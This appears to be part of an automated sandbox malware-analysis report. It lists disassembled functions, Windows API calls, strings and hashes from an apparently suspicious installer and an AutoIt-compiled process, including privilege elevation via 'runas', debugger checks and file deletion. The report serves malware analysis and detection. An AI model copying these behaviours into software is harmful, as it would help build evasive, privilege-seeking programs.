API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Climb.comPID: 5660, Parent PID: 1240COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	58

Executed Functions

Function 004F5FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 004F5FF7

Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A

GetCurrentProcess.KERNEL32(?,0058DC2C,00000000,?,?), ref: 004F6123
IsWow64Process.KERNEL32(00000000,?,?), ref: 004F612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 004F6155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004F6167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 004F6175
FreeLibrary.KERNEL32(00000000,?,?), ref: 004F617C
GetSystemInfo.KERNEL32(?,?,?), ref: 004F61A1

Strings

|O, xrefs: 005350F7
kernel32.dll, xrefs: 004F6150
GetNativeSystemInfo, xrefs: 004F6161

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: b008a5a4d01840759cadd2d72f3e592652b1157944eece4991e44902ac5a4469
Instruction ID: 2a4daf9be2779e50190e37ab95465a51b2140e093ef07b5ea7cc419696a9d9a0
Opcode Fuzzy Hash: b008a5a4d01840759cadd2d72f3e592652b1157944eece4991e44902ac5a4469
Instruction Fuzzy Hash: 47A1F33290ABC4CFC712CBB87C45DA53FA47B36B00F285D9AE58493262D66D054CEB36

Function 004F338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,004F3368,?), ref: 004F33BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,004F3368,?), ref: 004F33CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,005C2418,005C2400,?,?,?,?,?,?,004F3368,?), ref: 004F343A

Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A

Part of subcall function 004F425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,004F3462,005C2418,?,?,?,?,?,?,?,004F3368,?), ref: 004F42A0

SetCurrentDirectoryW.KERNEL32(?,00000001,005C2418,?,?,?,?,?,?,?,004F3368,?), ref: 004F34BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00533CB0
SetCurrentDirectoryW.KERNEL32(?,005C2418,?,?,?,?,?,?,?,004F3368,?), ref: 00533CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005B31F4,005C2418,?,?,?,?,?,?,?,004F3368), ref: 00533D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00533D81

Part of subcall function 004F34D3: GetSysColorBrush.USER32(0000000F), ref: 004F34DE
Part of subcall function 004F34D3: LoadCursorW.USER32(00000000,00007F00), ref: 004F34ED
Part of subcall function 004F34D3: LoadIconW.USER32(00000063), ref: 004F3503
Part of subcall function 004F34D3: LoadIconW.USER32(000000A4), ref: 004F3515
Part of subcall function 004F34D3: LoadIconW.USER32(000000A2), ref: 004F3527
Part of subcall function 004F34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004F353F
Part of subcall function 004F34D3: RegisterClassExW.USER32(?), ref: 004F3590

Part of subcall function 004F35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004F35E1
Part of subcall function 004F35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004F3602
Part of subcall function 004F35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,004F3368,?), ref: 004F3616
Part of subcall function 004F35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,004F3368,?), ref: 004F361F

Part of subcall function 004F396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004F3A3C

Strings

0$\, xrefs: 004F3495
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00533CAA
runas, xrefs: 00533D75
AutoIt, xrefs: 00533CA5

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: 0$\$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-3229954163
Opcode ID: 4c57b292275775026540355a366c393ec8ad17ba747b8e7b873e9db2fbcd7335
Instruction ID: 055483d5c935b12c50759ae91b28fefb3290d473e1f6ade42dd41f4b37cdafe4
Opcode Fuzzy Hash: 4c57b292275775026540355a366c393ec8ad17ba747b8e7b873e9db2fbcd7335
Instruction Fuzzy Hash: 9851F730108348AECB05EF61DC45DBE7FB8AFA4749F00192EF681521A2DF689A4DD767

Function 0055DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F55D1,?,?,00534B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 004F5871

Part of subcall function 0055EAB0: GetFileAttributesW.KERNEL32(?,0055D840), ref: 0055EAB1

FindFirstFileW.KERNEL32(?,?), ref: 0055DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 0055DD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 0055DD2C
FindClose.KERNEL32(00000000), ref: 0055DD43
FindClose.KERNEL32(00000000), ref: 0055DD4C

Strings

\*.*, xrefs: 0055DC9D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
